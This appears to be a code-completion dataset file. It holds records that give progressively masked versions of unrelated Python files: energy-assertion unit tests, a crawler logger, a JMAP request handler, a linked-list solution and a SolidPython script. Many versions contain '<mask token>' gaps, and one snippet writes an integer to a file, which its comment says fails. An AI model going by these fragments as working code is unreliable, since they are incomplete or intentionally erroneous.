asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = './test_asserts_db.csv'
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| """Test Assert module."""
import unittest
from physalia import asserts
from physalia.fixtures.models import create_random_sample
from physalia.models import Measurement
# pylint: disable=missing-docstring
class TestAssert(unittest.TestCase):
TEST_CSV_STORAGE = "./test_asserts_db.csv"
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(
9, 1,
app_pkg='com.sample',
use_case='login'
)
sample_high_energy = create_random_sample(
12, 1,
app_pkg='com.sample',
use_case='login'
)
existing_sample_one = create_random_sample(
10, 1,
app_pkg='com.persisted',
use_case='login'
)
existing_sample_two = create_random_sample(
11, 1,
app_pkg='com.persisted',
use_case='logout'
)
for measurement in existing_sample_one+existing_sample_two:
measurement.persist()
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted"
)
asserts.consumption_lower_than_app(
sample_low_energy, "com.persisted", "login"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted"
)
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(
sample_high_energy, "com.persisted", "login"
)
def test_top_percentile(self):
sample = create_random_sample(
11, 1,
app_pkg='com.sample',
use_case='login'
)
for i in range(100):
existing_sample = create_random_sample(
i, 1,
app_pkg=('com.persisted.{}'.format(i)),
use_case='login'
)
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| [
4,
5,
6,
7,
8
] |
1,678 | e4f07355300003943d2fc09f80746a1201de7e37 | <mask token>
| <mask token>
with open(fn, 'w') as file_Obj:
file_Obj.write(x)
| fn = 'out14_26.txt'
x = 100
with open(fn, 'w') as file_Obj:
file_Obj.write(x)
| # ch14_26.py
fn = 'out14_26.txt'
x = 100
with open(fn, 'w') as file_Obj:
file_Obj.write(x) # 直接輸出數值x產生錯誤
| null | [
0,
1,
2,
3
] |
1,679 | 63001128d9cb934d6f9d57db668a43ba58f4ece3 | <mask token>
class ICrawlerLog:
<mask token>
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
<mask token>
| <mask token>
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
<mask token>
| <mask token>
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
def log(name):
def wraaper(func):
def inner(*args, **kwargs):
log = ICrawlerLog(name).save
log.info('{}开始执行'.format(func))
try:
result = func(*args, **kwargs)
if result:
log.info('{}执行成功'.format(func))
return result
else:
log.error('{}执行后返回值为空'.format(func))
return None
except Exception as e:
log.error('{}程序异常执行失败,程序终止'.format(func))
log.error(e)
return False
return inner
return wraaper
| from SpiderTools.tool import platform_system
from SpidersLog.file_handler import SafeFileHandler
from Env.parse_yaml import FileConfigParser
from Env import log_variable as lv
from staticparm import root_path
from SpiderTools.tool import get_username
import logging
import logging.handlers
import traceback
class ICrawlerLog:
level_relations = {'debug': logging.DEBUG, 'info': logging.INFO,
'warning': logging.WARNING, 'error': logging.ERROR, 'crit': logging
.CRITICAL}
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
"""
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
"""
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),
key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=
platform_system(), key='log')
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(
self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear()
if not self.logger.handlers:
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' +
'%s %s %s %s %s ' % (group_code, job_code, jobinst_id,
fire_time, address_code) + '%(message)s')
fh.setFormatter(formatter)
self.logger.addHandler(fh)
fh.close()
return self.logger
def log(name):
def wraaper(func):
def inner(*args, **kwargs):
log = ICrawlerLog(name).save
log.info('{}开始执行'.format(func))
try:
result = func(*args, **kwargs)
if result:
log.info('{}执行成功'.format(func))
return result
else:
log.error('{}执行后返回值为空'.format(func))
return None
except Exception as e:
log.error('{}程序异常执行失败,程序终止'.format(func))
log.error(e)
return False
return inner
return wraaper
| # encoding: utf-8
from SpiderTools.tool import platform_system
from SpidersLog.file_handler import SafeFileHandler
from Env.parse_yaml import FileConfigParser
from Env import log_variable as lv
from staticparm import root_path
from SpiderTools.tool import get_username
import logging
import logging.handlers
import traceback
class ICrawlerLog:
level_relations = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'crit': logging.CRITICAL
} # 日志级别关系映射
def __init__(self, name, logger=None):
self.logger = logger
self.name = name
@property
def save(self, *args, **kwargs):
'''
指定保存日志的文件路径,日志级别,以及调用文件
将日志存入到指定的文件中
'''
jobinst_id = lv.get_jobinst_id()
job_code = lv.get_job_code()
fire_time = lv.get_fire_time()
group_code = lv.get_group_code()
address_code = lv.get_address_code()
# year = time.strftime('%Y', time.localtime()) # 获取完整年份
# month = time.strftime('%m', time.localtime()) # 获取月
# day = time.strftime('%d', time.localtime()) # 获取日
# 创建一个logger
self.logger = logging.getLogger(self.logger)
self.logger.setLevel(logging.INFO)
# 创建一个handler,用于写入日志文件
# self.log_time = time.strftime("%Y_%m_%d_")
if platform_system() == 'Linux':
log_path = FileConfigParser().get_path(server=platform_system(),key='log-cb')
if platform_system() == 'Windows':
log_path = root_path + FileConfigParser().get_path(server=platform_system(), key='log')
# log_path = './Logs/'
# log_path = '/home/ijep/domain/logs/python/'
# log_name = log_path + 'icrawlerspider.spider.%s-%s-%s.log' % (year, month, day)
if self.name == 'spider':
name = 'icrawlerspider.spider.log'
elif self.name == 'middleware':
name = 'icrawlerspider.middleware.log'
log_name = log_path + name
filename = self.logger.handlers[0].baseFilename.split('\\')[-1] if len(self.logger.handlers) > 0 else ''
if log_name.split('/')[-1] != filename:
self.logger.handlers.clear() # 多个不同文件名的情况下用这个
if not self.logger.handlers:
# 追加模式,按照日期来设置日志,handlers中TimedRotatingFileHandler就是按照日期来设置,RotatingFileHandler这个按照文件大小来设置
# fh = logging.handlers.TimedRotatingFileHandler(log_name, when='D', interval=1, encoding='utf-8')
fh = SafeFileHandler(log_name, mode='a', encoding='utf-8')
# fh.setLevel(logging.INFO)
# 定义handler的输出格式
formatter = logging.Formatter('[%(asctime)s][%(levelname)s] ' + '%s %s %s %s %s '
% (group_code, job_code, jobinst_id, fire_time, address_code) + '%(message)s')
# '%(filename)s->%(funcName)s line:%(lineno)d
fh.setFormatter(formatter)
# 给logger添加handler
self.logger.addHandler(fh)
# 添加下面一句,在记录日志之后移除句柄
# self.logger.info('记录数据')
# self.logger.removeHandler(fh)
# 关闭打开的文件
fh.close()
return self.logger
def log(name):
def wraaper(func):
def inner(*args, **kwargs): # 如果想返回result必须再包裹一层
log = ICrawlerLog(name).save
log.info("{}开始执行".format(func))
try:
result = func(*args, **kwargs) # 如果不是在类的函数里使用装饰器就可以这么写,如果这么写会报需要self入参(因为你是用类作为装饰器,函数就不会这样)
if result:
log.info("{}执行成功".format(func))
# log.info("结果是: %s" % result)
return result
else:
log.error("{}执行后返回值为空".format(func))
return None
except Exception as e:
# traceback.print_exc()
log.error("{}程序异常执行失败,程序终止".format(func))
log.error(e)
return False
return inner
return wraaper
| [
3,
4,
5,
6,
7
] |
1,680 | aac3b2478980d3a5453451cb848afcfd6aca1743 | <mask token>
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
<mask token>
| <mask token>
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| <mask token>
CAPABILITIES = {'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| import logging as log
from time import monotonic
import re
from jmap.account import ImapAccount
import jmap.core as core
import jmap.mail as mail
import jmap.submission as submission
import jmap.vacationresponse as vacationresponse
import jmap.contacts as contacts
import jmap.calendars as calendars
from jmap import errors
CAPABILITIES = {'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error', {'type': 'resultReference',
'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error:
continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {'type': e.__class__.__name__,
'message': str(e)}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
if kwargs.get('ids', None):
logbit += ' [' + ','.join(kwargs['ids'][:4])
if len(kwargs['ids']) > 4:
logbit += ', ...' + str(len(kwargs['ids']))
logbit += ']'
if kwargs.get('properties', None):
logbit += ' (' + ','.join(kwargs['properties'][:4])
if len(kwargs['properties']) > 4:
logbit += ', ...' + str(len(kwargs['properties']))
logbit += ')'
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {'methodResponses': results, 'sessionState': user.sessionState}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) ->ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match('^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| import logging as log
from time import monotonic
import re
from jmap.account import ImapAccount
import jmap.core as core
import jmap.mail as mail
import jmap.submission as submission
import jmap.vacationresponse as vacationresponse
import jmap.contacts as contacts
import jmap.calendars as calendars
from jmap import errors
CAPABILITIES = {
'urn:ietf:params:jmap:core': core,
'urn:ietf:params:jmap:mail': mail,
# 'urn:ietf:params:jmap:submission': jmap.submission,
# 'urn:ietf:params:jmap:vacationresponse': jmap.vacationresponse,
# 'urn:ietf:params:jmap:contacts': jmap.contacts,
# 'urn:ietf:params:jmap:calendars': jmap.calendars,
}
def handle_request(user, data):
results = []
resultsByTag = {}
api = Api(user, data.get('createdIds', None))
for capability in data['using']:
CAPABILITIES[capability].register_methods(api)
for cmd, kwargs, tag in data['methodCalls']:
t0 = monotonic()
logbit = ''
try:
func = api.methods[cmd]
except KeyError:
results.append(('error', {'error': 'unknownMethod'}, tag))
continue
# resolve kwargs
error = False
for key in [k for k in kwargs.keys() if k[0] == '#']:
# we are updating dict over which we iterate
# please check that your changes don't skip keys
val = kwargs.pop(key)
val = _parsepath(val['path'], resultsByTag[val['resultOf']])
if val is None:
results.append(('error',
{'type': 'resultReference', 'message': repr(val)}, tag))
error = True
break
elif not isinstance(val, list):
val = [val]
kwargs[key[1:]] = val
if error: continue
try:
result = func(api, **kwargs)
results.append((cmd, result, tag))
resultsByTag[tag] = result
except Exception as e:
results.append(('error', {
'type': e.__class__.__name__,
'message': str(e),
}, tag))
raise e
api.rollback()
elapsed = monotonic() - t0
# log method call
if kwargs.get('ids', None):
logbit += " [" + (",".join(kwargs['ids'][:4]))
if len(kwargs['ids']) > 4:
logbit += ", ..." + str(len(kwargs['ids']))
logbit += "]"
if kwargs.get('properties', None):
logbit += " (" + (",".join(kwargs['properties'][:4]))
if len(kwargs['properties']) > 4:
logbit += ", ..." + str(len(kwargs['properties']))
logbit += ")"
log.info(f'JMAP CMD {cmd}{logbit} took {elapsed}')
out = {
'methodResponses': results,
'sessionState': user.sessionState,
}
if 'createdIds' in data:
out['createdIds'] = data['createdIds']
return out
class Api:
def __init__(self, user, idmap=None):
self.user = user
self._idmap = idmap or {}
self.methods = {}
def get_account(self, accountId) -> ImapAccount:
try:
return self.user.accounts[accountId]
except KeyError:
raise errors.accountNotFound()
def setid(self, key, val):
self._idmap[f'#{key}'] = val
def idmap(self, key):
return self._idmap.get(key, key)
def _parsepath(path, item):
match = re.match(r'^/([^/]+)', path)
if not match:
return item
selector = match.group(1)
if isinstance(item, list):
if selector == '*':
res = []
for one in item:
r = _parsepath(path[match.end():], one)
if isinstance(r, list):
res.extend(r)
else:
res.append(r)
return res
if selector.isnumeric():
return item[int(selector)]
elif isinstance(item, dict):
return _parsepath(path[match.end():], item[selector])
return item
| [
6,
7,
8,
9,
10
] |
1,681 | 66f60eb86137203a74656be13b631384eba30c84 | class Solution(object):
<mask token>
<mask token>
<mask token>
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
if not index < length + 1:
return None
return self.get_nth_node(headA, len(l1) - index + 1)
<mask token>
<mask token>
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
if not index < length + 1:
return None
return self.get_nth_node(headA, len(l1) - index + 1)
<mask token>
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
if not index < length + 1:
return None
return self.get_nth_node(headA, len(l1) - index + 1)
def linkList_to_list(self, head):
if not head:
return []
l = []
while head:
l.append(head.val)
head = head.next
return l
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def getIntersectionNode(self, headA, headB):
"""
:type head1, head1: ListNode
:rtype: ListNode
"""
if not headA or not headB:
return None
l1 = self.linkList_to_list(headA)
l2 = self.linkList_to_list(headB)
length = len(l1) if len(l1) < len(l2) else len(l2)
index = 0
for i in range(1, length + 1):
if l1[-i] == l2[-i]:
index = i
if not index < length + 1:
return None
return self.get_nth_node(headA, len(l1) - index + 1)
def linkList_to_list(self, head):
if not head:
return []
l = []
while head:
l.append(head.val)
head = head.next
return l
def get_nth_node(self, head, n):
try:
c = 1
while c < n:
head = head.next
c += 1
return head
except IndexError:
return None
| [
1,
2,
3,
4,
5
] |
1,682 | 27ca60435c614e4d748917da45fc2fc75ee59f1c | <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
<mask token>
def export(shape, filename):
with open(filename + '.scad', 'w+') as f:
f.write(scad_render(shape, file_header='$fn = %s;' % SEGMENTS))
f.closed
print('Success')
<mask token>
| <mask token>
def voxels():
shape = []
for x in range(-5, 4, 1):
for y in range(-5, 4, 1):
for z in range(0, 10, 1):
translate([x, y, z])
new_cube = color([0, 0, 1, 0.5])(cube([1, 1, 1], center=False))
shape.append(new_cube)
return shape
def basic_geometry():
box_functions = [makeRectBeam, makeCubeBeam, makeTriangleBeam,
makeNothingBox, makeCylindBeam, makeHollowCylindBeam,
makeHollowCone, makeEye]
shape_list = []
for bf in box_functions:
for cf in box_functions:
for bf2 in box_functions:
for i in range(2):
shape = union()(bf(5, 4, 5), translate([0, 0, 5])(cf(4,
3, 5)), translate([0, 0, 10])(bf2(5, 4, 5)))
if i == 0:
shapeInner = cylinder(r=0.5, h=20, center=False)
shape = shape - shapeInner
shape_list.append(shape)
